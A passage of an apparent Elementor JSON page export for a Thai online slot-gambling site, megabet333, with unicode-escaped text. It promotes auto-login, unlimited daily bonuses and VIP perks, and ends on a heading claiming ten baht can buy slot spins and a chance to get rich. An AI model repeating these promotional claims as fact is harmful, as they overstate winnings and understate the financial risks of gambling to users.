\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e48\\u0e32\\u0e22\\u0e43\\u0e2b\\u0e0d\\u0e48 megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a <strong><a href=\\\"http:\\/\\/mgbline.com\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Line Official<\\/a><\\/strong> \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 